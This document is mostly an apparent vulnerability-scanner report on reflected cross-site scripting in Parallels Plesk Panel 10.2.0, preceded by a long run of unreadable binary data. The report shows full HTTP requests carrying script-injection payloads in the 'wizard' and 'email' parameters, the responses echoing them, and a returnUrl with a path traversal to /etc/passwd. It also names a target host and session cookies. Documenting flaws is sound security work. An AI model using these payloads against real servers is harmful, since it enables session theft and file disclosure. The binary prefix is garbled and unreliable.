...{.o.oZ...<..y..=:yx.8..c.c..-...+..^..r.....i^.....o.RN.M...0..>s.}.l..........O.&.........G..%W.....    .....\....=>.....,.?.h..W..%.`|?.x.......MsS..,...zG...cVi..$qD.....X...N7rFz....aq..?3'i.-.q.0........?.`7.....Hn<..w.v..H;........U...s..`.^.I.......V.y..h..yg...a3.. .s.m...N......T.....mmn.TX.BeP..g..........+......jARKs..+..'...'.......i..k...    ,....... .v6:z....^...w.Fc.....i&.g.F_."..G.........X.......?..T.(VX........n-.]..b...(.X.. |.. ....c..7..)sg...$Sy.e.}....{...mQ.............~.*?..?..?....e]...9..d......%....KM*...p.....?/......>`I.K..c..?......T.,...............\<..E...H..1.|)$.|..v...j7.ci%..H.;<."wc.......,.q..\.Am....c..?......T.,.......i.H........R..4..we.23....y9{....Y...I.t...4k.w]......wd.~.syV..].\...X.......?................d.I.].\]..Hb.].T....h.|......5..{kS%..p.]....I3.i.@8...##.9[..............~.*..U&...,.<q.X..3.89>...V...+.....L...
..~b...Q......t.tq..xc.c.h...I(I>.7..c......n...y...i.$~U...d...9.Fs...I.MC.......j_....
J.....V.O........|..
J.W.?e...i...o....o._..?.)+.2.W.n.s.}.-...f.e...q^y.O.xdx....    {;...$M8.Q........W#.w6{..$.(q.~h.......uy...n..MB9C.0.8.0    9. P3.=x...$..[....G..i..U......5...O}kw...&9..~.r.h..t.c.$..~c..sC...........o...    Vc.c....^hu...1=.8.=..2.    VL.G<....v8........k.+9....b3..bP..T..ap2..$.`.3J..Y...Q.I_.'..c'....6i.iKjA..!.s....P......>.#e
S<..@...<.kZ..T.....?..O,)o...P...b..o .....C.........x%...T.,c.@."...oL.*y<q....g....i.{..u....u.!..o.#..xj.F..?K....|...8R<..'.z....^....E...E+.....q.. ....[ ....i>,..\.rlm-.A#......m..S..r2.....A...../.;.."..[..............v.e........i2[...;........_..(/-c.670.".L.....Wl$..0.#r.^y...kR.....KP./.Sm8.@2.f.aq.q.<..@...=...!.4F<7x.>.,4.6A...v@ s...H..H...O.l.4..O..HG...~...z.....6....h..."i..n...X.%@...2.d....'..?.. Cl2....G;......:....Cpq..d/f..)..RYZU........$......?.R...B...6...    ZT[.w.,I..^......|Ky.....X.N.../.6...A...K)..OC...]x..O.k.b^xb.am..e..:.1@s.    ...:...~......."...J..;.i%f(}T...:zSm|1..~...0..).&rJ.e;T..e..........Qi.......\oVO!.R.c.....+..4.._v.b\G..... ...k....d.....'...G.a....t..o.gi.............v.Vv...!K......IO...............RWR.../.sO...x?.C~".......IW...|:.....a.......q([.....b.I+....ye....?.E..7..&....U..q;.......#k`...{.k..Ki....h.0..G...A..>4...j..`.I.+I................<.Tn..=,....M..k....|<......H...$0..!rH.',.............p.;....X....q.2.#.. .    ..k..<R./....'s.Kr-...lr..P1....q....s.:...z...n..%.....3`.Y...    '...'..\..{.?.9.u^.....e....{............:.
.B.s....LIq..{.D.=......h.|.dLmv.....`...j/.......b...,...H...X ;.pWoq.5c...4^Cj........P......1..A..".^G......]..^.$N.A...ag....9...X.......Y]..o./eH.15.!1. .
.-./-....d.\..Q6...pYA0.....Y...s.    #...........3....x..q.....\.G..y..!..5.do3P...U..k...*.x;...H%
........{....._....S...EpT..F.~x"...,4....gV`....cRp..A.    .,@....s.hm.k{..H._.2.,...(I..`.G..    9....w-iz".r......c..W_...p.('..X..`..I.%...._...d..e...q..Wx...0..99..[....`...H.N....v.B......:z.I5..u5.y\L\G...a..S ....)9.z.;.r...m.c..._.er%..r*.. ;.|..K1...9....65(n..w...Z.1}.R.w.H....:U....6...5.'..].2y ...v....$..85..N..sq4.M.1E!y#..    .................C.....[......S|....
.n....Q.4..;....!5..=.z{e."4...}...t.....Kqa..O/.........B.:..................'+$.......*#.b.....0_|P+.._2....Y.G..5/.....%h.......CR...0.RV.`...<...!............    .y...x.    ..6ai..\.s.Q....E.._#..B..%.........1!.o.......7b..W.ocih....A....\.U...:..|{m.{].....k..r...ZN.......[ ?..n..x...>........I...gj..N.'.....q..X....=..j....I..c.|..j^!....Q4v.p.RO..K rB..`....... ..j.W......n.%..Ys.L.VF#$........k.OW._....4Q.,.w...C...8.2q.d....B.O.3.JR<..R..N...K...I...c..X...V.V....=..........\.I..24......B.K.0......................y........ ...;.2x8...!...{..2Go.*...".........NF3..O..5F.m... I.........`.8.......fU.....5.0[[.....S2..8..!..YI$........    fK.......Y.....w m..0@T$|.x.....OS...\F4....cK....x.....'.9
....jG.o...............n!?.~`r@.}Eu.P.#....h.q...Gm.A..m.fu,9......U.=...k.#R..b..&.L..<Wr.:.....-..]....|..z(.......=a..OG.6"..\.M#..L..)P.\3}..@..<G.M".E....&i..(.
.wGpY..>...;.]E..........*..<.
:{.N..N....X..F.:.0.=    ......k..T...Be.K.}..
L..?$......w*3....>...D...m...X4.`..",.......^+..U.=....v!c..@    ..
........o.gi.............v.Vv...!K......IZ../.T....E.._#..B.......s...E.q..p........(.I........G..%u+.......4.mK.....4.T.....h..yr..f.@.t.q.q...W...uO..6.<i#".2...0b    <...x...Rk.....i....0=...@`D.\.p9....#...VS.;..9.H.+....Y>..XX.......2.A*..3.8.U...'....f....,p...ct..r.....g......g...w.z..x..m....n....8..Ejg....3.3.....G..q....K/&. .^    .)!s")..3.0..q.7t.<......m..U.........q. ....c..:ZZkB^.    ../..zu..#...|!e].....+....IR..i"..b...-/J...d[46...-(.20B..M.q..N+.h.h.S......_Ma...B....x.s..b.aA..m.89.O...n.y...L.<...{.g-..>V=.?/..9..wTP...<....K..} =.ww..>.-.Q/.|..&:..\.(.}....s{...].......,4,]n.K...x!y..=k.h.h...<C`&..7:]...%...........7.B..BA#9.W.aiws,...ys....h[.c........vTP.C...c........N4...j<.y.s...'.L.4.:.|c,...M.......$...%.2c...$..pMv..V.RB.....?..I.c.ys....@t...v.Vv...!K......IZ:.o.gi.............2.eO....o._..?.)*......G/......|.g.z}..n.s.?..Z....E.._#..B.........6...z....t..C.LY....l[...a...\...!w...!.Y d.6.J..c...-.......'_.........v....Y'....@.y...Y.T...t.Fk.D...:.4.f..ql.$o..F..9$...;Q.A..    ...)2..wi.U?.....r{V....P.W..Z5+0*|...+.s..=).o...3..K.B9PYs...hKD.99I...y..km..:..Qoosqu$....L_....M..)4eq.[...f.ZgS...q..8.+.m........C        .N......j.=p=).Z>.|....ip. ..X..|m.A.p...R..M^.M?E...1$...J......\....o.^.,..K......c$....!-.l..rO$
.l..-:....pZ...\...OS.1...F.,.    i..@.O4..U.......=i...os...^.q<.]..4. 2H.]C..|...d.....j...c.....G.....[<.1.I.    .5`F:.0q.u?.:v.o.Z..h..+.1..x.I$.....i..C....1@..H.U......    ..=M4....gO..?..\O.<..j7V.....$~n..]..v;...z...{..3S.K...K....)g...}.paU.....d...z
.Z..m.+....#.k.w0.'sd.......4O3...#L.JV..p.{w...z.@...>$.......\y.7).k/.U.....&N.>o_\VL.....u.j..;[...D.H.b..    #z.....r8..]....5...W.>7E*.F...<u...- ..V..!.....b.eG..p=....G.Eyuuz....{.]!...6.....W .H9.,}......6.-..._..]...q.._...aF~_1.9.)......t.......,q.%r..2........Q"./...|..4.$DTyXm26.K`.............;}+;H.......\`......C.......j_....
J...}......7./........*..[...) [...t$...N.^.NjO....o._..?.)+.[[o.Y...y.$.].wV.z.M&..;6..i..."g6...1R.0.'.#.9.c...G{..]o.{=9..gS..f..e.#.... .Mt.....+i/t..hl..w..........t..GQ..OCz2.......u....[.v.I..k{F....la....>..9.]Z.{mOF.....m....Q...zr...ZP..    ....F.V.........:.....qysi5..X...X....V.a.jQVI.I.....S.....v.}..qc.........Z0?.#q...F._.M.5.k.B$...K8...............;z.....f.{{...H]..F....Q...y[z......]
..He.f.Tw....d.....s..........w".7'.$.:3...........j.,.....r|./....j&.m.....q....N..J..;........U.Z0h....jQ.7..g......`c=c..Vo^,.V...e......M.. 0.`.9...V..cK.[..    ...Sgoy......@.*.y..3.=..._x.4..X.y..\.}..m...`..:...3.'........)i... ....f...
|..S............u.<...2....%3"a...h9Q.P%........H...5.wry..D$....!..n    Q......Oy.4....;....YvC2....#$..@..?......X........S..t..@...F[.R..<..P.V.)d2I<.....#........ex.'.<........m|...f.E.......|....]oGY.b....6r1..'<hX......{x....h.X.2.....*..a....~.....oo../.y...........s.NO=1v=2;.....z.W.x.S...Q......t....j........_.G .m#+,.n>s..G.26m.....t....uh..i..H.;.....h*.FO....v....H......e.[k.{Y..*....r.u+.......X\._j.J..S:.V)....F..........{+.j......CR...0.RV....Y.G..5/.....%i...eO....o._..?.)*.x.O.W..<..0......n%.v<......o._..?.)*.xoO.W.i<.....3f......<R...........fKi....Z'....../.f..G.-dh...c).......z~.+f.....mm.........U5...D.I..=...w0...."..q..%.m....-X.+..x|.I.ZIr..+....'.9..w..4....bZ...[....VY|...O..8.H...@.5r.$....v..Uw...c...........[L3.mn.....
...z....#..1q...{$MI'6..... ....;.1b.$....9...w....R8......I..t.l..4.oq=.[6%-..4.......A..NiA....t.Am....nm+%.Le6..)....&3..I."...fm.,.t.^..p.    p..Jah.F..%.. ......'_,....+.F.Y.......Y1..JkY'..U..Lmk*.......l........Z^.............gU.`..&z...Tg......h...l.Y`.'...##.}..C.........x.M.....#.9"5.    $rFwe.K.`.#........W.........d2...UUA-.s.z.VtZ..dm.-..k..&X...!..s...v.Q...=).xR..{K.i.{..(..w..e-.0..X68..q.".:...K.{%....i..V........    ....`z.    .&.k.V......"u....^Gc...{.
.y..Dc..    ..`.....B......\.0r}..k..S.H..6.;.x..;..Z....K6..:.q.GK....t.'.#.....$
fU,.)h..    
H.i...9..'.m..e....,W..bg.HI...2.L.$m.......|.s....\D....{p..L..#......yj.]..|@....a...w..>.a+....s.A=1.=-....4$.&....fYZ).,k.....we.K.`.#...d.4.....)...n.uR.D.....;[.zV<:&........]E-.1.3......pRw./.......>....n,4.,.K.*;....2...`.. ....w.4.......J..?.!...?.)+GP....#.B...q...B....?l.........G..%t"...VKs<^q...x...N..x?.C~".......IQ..[......"....Y.@E...lV..b.I.wa...v@...    vn.|..*.N.    =:{s.I..........3........8....P..........;......{..s.......N.{v.....$..}....%`y.<.....Mws....3...B..'.{.O.V\#...8...=.A..3_.....VM.{..I,.....C.@e.-..........!>}b.Q~^.GV*-z........I%?..!..y.2HD..22q...*.x.J.+W.\K..g.m.f..R.eQI\.....+.X'......(..ym....gr.....l....$0S.Ppil..N.U....,U`.?j..8.@..T...U.e... .9..-Y...j..2..y..+....d.......9..<..^]..p.;...e..>B......b..h......-.......1.i].bJ...n.c.`U{...]wH..Y$.k.....-.. eo@...r.........Z...}.....<r!.$........1...9..2M:..z~.v...zeF...'.P.v...S..    .=k....og.Z.}...n.....R.`...y...........j:.....|.2.@u.b... .....].m.Y......[3$.Q...F1..u..<.    ....b.<l........C.q\....x.m..67..w;.;U.. ......\...]6.f.6.......m6K...c.yH..wv...=A..v=#....kM0..)yI..0..>:...`dd..#.W.......ZF...-".......!...F.c..9..j.C"[Zjwv......;]YDd...].<A. ..$...c.O....W....-.....h...U![9..X...{pj.....K-....H..9g`.8.$
...8....4......p.[.%.....G.]..s....'..4.,W.tU6.K).0....Y.......8,..;P..3.u..J..?.!...?.)+GP....#.B...q...B...._l.........G..%u+.......4.m\.....7./......V.H?.#...i.O.>O3.=>...v9........>k$w9.2...>Z.y...c..Q..G..L..S..f.....8..u..U['d.P..r.q.<q.....9./...E.$.z;Z..N.Q.M./..)+@.$..7d...S...\.a....F,K.T...=1.}hx...O....K.....v....q).......@..b."..m".ZZ...\ua...s........^8.4.o....I.$...H.....,Y.....WM_Y...Z+..2=...}..X.B...|....n9+.{FV;....5-j........-b..KH.;w.KM..xB.`!..u....G}.k.m$.....E.2/.z6._.#......v`...h..][X....j.Z.k..G.1.........P.......T.jz..NnE..$7P......$XwHI\..c.N=A.u.....h....%...n&....j    ..+...w..q....;........L.]....VM.H...(lg#y..'.K.....C.ik.......c..4.j."...+/.dl8...    #..8..K...^./.u.;..\M.fD..veWh........h....\F..;.;X{i'..;..]3"....lU...1._......P.....y?../.1    ...|)%NB...u.l..._.ms..
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="url"


------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_1"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_32"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_512"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_1024"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_2"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_4"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_8"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_16"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="conhelp"

will it take xss?
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="private"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="cb_id"

0
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="cmd"

update
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="wizstep"

1
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="wizard"

/plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="wizaction"

finish
------WebKitFormBoundary08k3wexWDUqjogvg--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:21:06 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:21:05 GMT
Connection: close
Content-Length: 907

ERROR: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323

0: UIPointer.php:49
   UIPointer::parse(string '/plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323')
1: common_func.php3:3913
   wizard_get()
2: Abstract.php:81
   Form_Abstract->__construct()
3: Abstract.php:95
   Form_Abstract->Form()
4: class.CustomButton.php:473
   CustomButtonEditForm->CustomButtonEditForm(integer '4')
5: CustomButtonPropertiesUIPointer.php:90
   CustomButtonPropertiesUIPointer->accessItem(string 'POST', NULL null)
6: UIPointer.php:600
   UIPointer->access(string 'POST')
7: plesk.php:47

2.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload 9529a<script>alert(1)</script>dec0102c10a2a2f60 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /plesk/client@2/custom-buttons/custom-button@new/properties/?text=XSS+Link+to+store.parallels.com+with+XSS&place=domain&sort_key=100&fname=%0d&url=http%3a%2f%2fstore.parallels.com%2fstore%3fAction%3dDisplayPage%26Locale%3den_US%26SiteID%3dpara%26id%3dThreePgCheckoutShoppingCartPage%264cff6--%3e%3cscript%3ealert%281%29%3c%2fscript%3e2ce5d8d75e9%3d1&conhelp=%2fstore%3fAction%3dDisplayPage%26Locale%3den_US%26SiteID%3dpara%26id%3dThreePgCheckoutShoppingCartPage%264cff6--%3e%3cscript%3ealert%281%29%3c%2fscript%3e2ce5d8d75e9%3d1&private=true&cb_id=0&forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2fclient@2%2fcustom-buttons%2fcustom-button@new%2fproperties%2f9529a%3cscript%3ealert%281%29%3c%2fscript%3edec0102c10a2a2f60&wizaction=finish HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/custom-button@new/properties/
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:15:05 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:15:05 GMT
Connection: close
Content-Length: 923

ERROR: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/9529a<script>alert(1)</script>dec0102c10a2a2f60

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/9529a<script>alert(1)</script>dec0102c10a2a2f60

0: UIPointer.php:49
   UIPointer::parse(string '/plesk/client@2/custom-buttons/custom-button@new/properties/9529a<script>alert(1)</script>dec0102c10a2a2f60')
1: common_func.php3:3913
   wizard_get()
2: Abstract.php:81
   Form_Abstract->__construct()
3: Abstract.php:95
   Form_Abstract->Form()
4: class.CustomButton.php:473
   CustomButtonEditForm->CustomButtonEditForm(integer '4')
5: CustomButtonPropertiesUIPointer.php:90
   CustomButtonPropertiesUIPointer->accessItem(string 'GET', NULL null)
6: UIPointer.php:600
   UIPointer->access(string 'GET')
7: plesk.php:47

2.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/create/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42c4"><script>alert(1)</script>e3e36e04876dbfe97 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /plesk/client@2/domain@1/backup/create/?forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=bak&comment=Domain++backup.%0d%0aCreation+date%3a+May+23%2c+2011+02%3a39+PM&split_backup=false&repository=local&email=%0da42c4%22%3e%3cscript%3ealert%281%29%3c%2fscript%3ee3e36e04876dbfe97&content=configuration_and_content&content_type=backup_content_all_at_domain&suspend=false HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/create/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:41:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:41:46 GMT
Connection: close
Content-Length: 17961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Back Up Data Related to the Subscription <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.create/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function splitBackupChanged()
{
   if ( $('fid-split_backup_checkbox').checked ) {
       $('fid-split_backup').value = "true";
       $('fid-split_backup_size').enable();
   } else {
       $('fid-split_backup').value = "false";
       $('fid-split_backup_size').disable();
   }
}

function suspendDomainChanged()
{    
   if ( $('fid-suspend_domain_checkbox').checked ) {
       $('fid-suspend').value = "true";
       $('suspend_domain_warning').show();
   } else {
       $('fid-suspend').value = "false";
       $('suspend_domain_warning').hide();
   }
}

function contentChanged()
{    
   content = $('fid-backup_content_all').checked;    
   content_options = $('fid-content_type');
   if( content_options )
       content_options.disabled = !content;
}

function initScreen()
{
   $('fid-split_backup_checkbox').observe('click', splitBackupChanged);
   if( $('fid-suspend_domain_checkbox') )
       $('fid-suspend_domain_checkbox').observe('click', suspendDomainChanged);
   
   splitBackupChanged();
   if( $('fid-suspend_domain_checkbox') )
       suspendDomainChanged();
       
   $('fid-backup_content_all').observe('click', contentChanged);
   $('fid-backup_content_configuration').observe('click', contentChanged);
   contentChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
